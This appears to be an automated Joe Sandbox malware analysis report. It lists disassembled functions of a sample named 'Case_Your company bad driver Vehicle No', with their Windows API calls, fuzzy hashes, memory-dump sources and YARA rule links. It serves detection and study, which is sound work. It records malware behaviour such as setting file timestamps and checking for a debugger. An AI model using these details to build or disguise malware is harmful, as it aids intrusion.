Function 00C19B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C19B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C19B99

Strings

aut, xrefs: 00C19B93

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 5f4c7db0464b48ffea76fda475620db3a478c476ac5c26c23d9954cb134c2294
Instruction ID: 3067ab724ec7887239ccc655f4508f93e2459f099f8c5f0585fe985c6d07b6c3
Opcode Fuzzy Hash: 5f4c7db0464b48ffea76fda475620db3a478c476ac5c26c23d9954cb134c2294
Instruction Fuzzy Hash: B7D05E7994030DABDB209B90DC4EFABB72CE704700F0046B1BE94910A1DEB155998B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C2CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae8cf56206eb60a623a98a97d43e1b34e4d987906828e36c38e9c54a94a68e0
Instruction ID: 0a8255b36d2aa39d445bb95f42278bde7156b236984e5ffd4b3aadf849c8a304
Opcode Fuzzy Hash: 4ae8cf56206eb60a623a98a97d43e1b34e4d987906828e36c38e9c54a94a68e0
Instruction Fuzzy Hash: C8F148706083519FC714DF28D480A6ABBE5FF88314F14896EF8AA9B351D771E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BD03D3
Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BD03DB
Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BD03E6
Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BD03F1
Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BD03F9
Part of subcall function 00BD03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD0401

Part of subcall function 00BC6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BBFA90), ref: 00BC62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BBFB2D
OleInitialize.OLE32(00000000), ref: 00BBFBAA
CloseHandle.KERNEL32(00000000), ref: 00BF49F2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d2b0ce6180415e5631bb06dfcfe6a348620af4b8c7e3f8541f962d30422afa84
Instruction ID: 86dd2258d3e491b8896a7ad714fa5db3054284d63f4f355c91652fc219bcbe60
Opcode Fuzzy Hash: d2b0ce6180415e5631bb06dfcfe6a348620af4b8c7e3f8541f962d30422afa84
Instruction Fuzzy Hash: 838199B0905A408FC798DF3AE9557697BE4FB8830871085AEE45DC7372EB718489CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BB4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BB44C3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: c981bbf2af3183d56366530b59b9452392e5be4f3d3ae0eb2d4e8c5ddf77e557
Instruction ID: 23a8633f27c751ea2f7933939fba0749aad55a1acc5b784da2ca39dd7f06f309
Opcode Fuzzy Hash: c981bbf2af3183d56366530b59b9452392e5be4f3d3ae0eb2d4e8c5ddf77e557
Instruction Fuzzy Hash: 883150705047018FD761DF24D8857EBBBE8FB49308F00096EF59A83352DBB56954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BD594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00BD5963

Part of subcall function 00BDA3AB: __NMSG_WRITE.LIBCMT ref: 00BDA3D2
Part of subcall function 00BDA3AB: __NMSG_WRITE.LIBCMT ref: 00BDA3DC

__NMSG_WRITE.LIBCMT ref: 00BD596A

Part of subcall function 00BDA408: GetModuleFileNameW.KERNEL32(00000000,00C743BA,00000104,?,00000001,00000000), ref: 00BDA49A
Part of subcall function 00BDA408: ___crtMessageBoxW.LIBCMT ref: 00BDA548

Part of subcall function 00BD32DF: ___crtCorExitProcess.LIBCMT ref: 00BD32E5
Part of subcall function 00BD32DF: ExitProcess.KERNEL32 ref: 00BD32EE

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00BD1013,?), ref: 00BD598F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 45d1f65b3eadd965114663a161c38fc2cad8837860ef1b1593cec6a5726fe62c
Instruction ID: 70bf89a5576e324c66b7efa8102aab8587977a8016a99f3b34af5772cf5e6d75
Opcode Fuzzy Hash: 45d1f65b3eadd965114663a161c38fc2cad8837860ef1b1593cec6a5726fe62c
Instruction Fuzzy Hash: 0101D235240A15DEE6352B25E8A2B6EF2C9DF51B71F1000BBF404AA3D2FE749D418665

Uniqueness

Uniqueness Score: -1.00%

Function 00C19B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C197D2,?,?,?,?,?,00000004), ref: 00C19B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C197D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C19B5B
CloseHandle.KERNEL32(00000000,?,00C197D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C19B62

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 78ced743a36bec61ddf75edbdd8b866cd6c2da8bf3f30447d4210c0abbabef1f
Instruction ID: 203973c47139418deaba8a5359e044b21d5b75c8504b3914b041b96d83772554
Opcode Fuzzy Hash: 78ced743a36bec61ddf75edbdd8b866cd6c2da8bf3f30447d4210c0abbabef1f
Instruction Fuzzy Hash: 2AE08632580314B7EB311B54FC09FDE7B18EB05761F104624FB24690E087B126129798

Uniqueness

Uniqueness Score: -1.00%

Function 00C18F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C18FA5

Part of subcall function 00BD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD9C64), ref: 00BD2FA9
Part of subcall function 00BD2F95: GetLastError.KERNEL32(00000000,?,00BD9C64), ref: 00BD2FBB

_free.LIBCMT ref: 00C18FB6
_free.LIBCMT ref: 00C18FC8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction ID: bfb4965f4fb429ff32394aae16cb772c6bfaa58bfbcd334b7a47fac71113c9d3
Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction Fuzzy Hash: 73E0C2A120C7004ACA20A7B8AD01EC797EE0F483507080C4EB419DB242EF24E9829024

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00BF002B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: cdf95d7fc1888f6ea07dff8e6b26554a63b1b33f8db612e73b205a57d89e7527
Instruction ID: 75f093788f2291e8d4f71cc4e69d12bf412909d4385f96e57f50fc5ec0314258
Opcode Fuzzy Hash: cdf95d7fc1888f6ea07dff8e6b26554a63b1b33f8db612e73b205a57d89e7527
Instruction Fuzzy Hash: D3223970908241DFCB24EF14C494BBABBE1FF45300F1489ADE9969B262D7B1ED45DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BB4E1A

Strings

EA06, xrefs: 00BEDCF5

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 9d1c9d5b9b0e569d92e30bdd672180d0505342408f6baf512c1882f5060c90e0
Instruction ID: 5fb0e965002c61f7e8fb1e1f5157330871ac3c7a3985151e66b2ae7bb237570e
Opcode Fuzzy Hash: 9d1c9d5b9b0e569d92e30bdd672180d0505342408f6baf512c1882f5060c90e0
Instruction Fuzzy Hash: 10416921A045586BCF299B6488917FE7FF6FB05300F6844E5F8869B283C7F1DD8183A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BB492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00BB4992

Part of subcall function 00BD35AC: __lock.LIBCMT ref: 00BD35B2
Part of subcall function 00BD35AC: DecodePointer.KERNEL32(00000001,?,00BB49A7,00C081BC), ref: 00BD35BE
Part of subcall function 00BD35AC: EncodePointer.KERNEL32(?,?,00BB49A7,00C081BC), ref: 00BD35C9

Part of subcall function 00BB4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BB4A73
Part of subcall function 00BB4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BB4A88

Part of subcall function 00BB3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB3B7A
Part of subcall function 00BB3B4C: IsDebuggerPresent.KERNEL32 ref: 00BB3B8C
Part of subcall function 00BB3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C762F8,00C762E0,?,?), ref: 00BB3BFD
Part of subcall function 00BB3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00BB3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BB49D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 109964b41f97cd1e1778fc028a1e0d7b37e236dd3968ec4910ff98fb0d0ad49e
Instruction ID: 7527d66b4da9e063b2877699b46cfd388193fae2ead447bc9ad1a96a7711385a
Opcode Fuzzy Hash: 109964b41f97cd1e1778fc028a1e0d7b37e236dd3968ec4910ff98fb0d0ad49e
Instruction Fuzzy Hash: EE116A719183159BC300DF28EC45A5EFBE8EB95710F00896EF189932B2DBB09585CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00BB5981,?,?,?,?), ref: 00BB5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00BB5981,?,?,?,?), ref: 00BEE19C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f39facf48f9238e195a3977ffd5e7a190364a1b16edf314408df89be43ee829a
Instruction ID: 7342d9e6efee7675927694bb839f6e3401bc63c8d40084b5089da5c7842940e5
Opcode Fuzzy Hash: f39facf48f9238e195a3977ffd5e7a190364a1b16edf314408df89be43ee829a
Instruction Fuzzy Hash: 89018070244608BFF7350E24DC8AFB67ADCEB05768F108358BAE56A1E0C7F09E458B51

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BD594C: __FF_MSGBANNER.LIBCMT ref: 00BD5963
Part of subcall function 00BD594C: __NMSG_WRITE.LIBCMT ref: 00BD596A
Part of subcall function 00BD594C: RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00BD1013,?), ref: 00BD598F

std::exception::exception.LIBCMT ref: 00BD102C
__CxxThrowException@8.LIBCMT ref: 00BD1041

Part of subcall function 00BD87DB: RaiseException.KERNEL32(?,?,?,00C6BAF8,00000000,?,?,?,?,00BD1046,?,00C6BAF8,?,00000001), ref: 00BD8830

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 494c8d9a37e97b1b2a4fab848a15eefb91125bed97f4e67e309a3a979b9e9219
Instruction ID: 9309753326001471e41713f62f60d21f670593e555bf1c1954cc608d822a1668
Opcode Fuzzy Hash: 494c8d9a37e97b1b2a4fab848a15eefb91125bed97f4e67e309a3a979b9e9219
Instruction Fuzzy Hash: BCF08675500219A6CB21BA58EC169DEF7ECEF00751F5004A7F80495751FB719A80D695

Uniqueness

Uniqueness Score: -1.00%

Function 00BD582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD585C
__lock_file.LIBCMT ref: 00BD587D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5d956e027fc8b2af209eba35aebadbe4612d2ca6c3fccf746116080e74608679
Instruction ID: d6a03ec652494576efbb7d06aefaf0d73558fed9c557a7d4df5545f19ec84aab
Opcode Fuzzy Hash: 5d956e027fc8b2af209eba35aebadbe4612d2ca6c3fccf746116080e74608679
Instruction Fuzzy Hash: F0018871800609EBCF32AF698C0159EFBE5AF40360F144297B8245A3A1FB32CA11EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BD55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

__lock_file.LIBCMT ref: 00BD561B

Part of subcall function 00BD6E4E: __lock.LIBCMT ref: 00BD6E71

__fclose_nolock.LIBCMT ref: 00BD5626

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 12f279ff8c123d5a90ad9bea7acf6389659b115131066ee5af63d65856ef9baf
Instruction ID: 6f82907801844bd83daada376312b248990af41185c351422b82f8c8b4ecaff0
Opcode Fuzzy Hash: 12f279ff8c123d5a90ad9bea7acf6389659b115131066ee5af63d65856ef9baf
Instruction Fuzzy Hash: 95F09071801A059AD731AF798802B6EF7E16F40335F65829BA425AB3C1EF7CCA019B55

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ab5aa0bc4197f095aedeb092ce4e0261e2da48374f2ac2537b8a57b35c0f31
Instruction ID: c30342c873ba7e9f9e08afb1e36111ac6bbd7251c4a8f2b667163a72a5bbcbb7
Opcode Fuzzy Hash: 37ab5aa0bc4197f095aedeb092ce4e0261e2da48374f2ac2537b8a57b35c0f31
Instruction Fuzzy Hash: 5561AC70A0060A9FDB20EF64C991ABBB7F5EF09300F1484BDEA069B251E7B1ED55CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9158d5f1f1b079dd7b325b68702c6ed9544b0691d10010cbd6c9e0d34ca416b2
Instruction ID: 3fb40c70197e1d91683ac95eec7239cc09a8d62ae5acf6db136a5f1b441bb70c
Opcode Fuzzy Hash: 9158d5f1f1b079dd7b325b68702c6ed9544b0691d10010cbd6c9e0d34ca416b2
Instruction Fuzzy Hash: 1A514C35600604ABCF14EB68C991FBE77E6EF45310F1481E8F946AB292DB70ED05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 015110D0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 015108E0: GetFileAttributesW.KERNELBASE(?), ref: 015108EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 015111FF

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
Instruction ID: 5405a0a573a84bee53c91df0df075085f1920d4b78db9e49388084ea2f1470ee
Opcode Fuzzy Hash: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
Instruction Fuzzy Hash: C851A531A1120A96EF14EFB4C954BEF7379FF58300F0045A9A609EB184EB799B44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

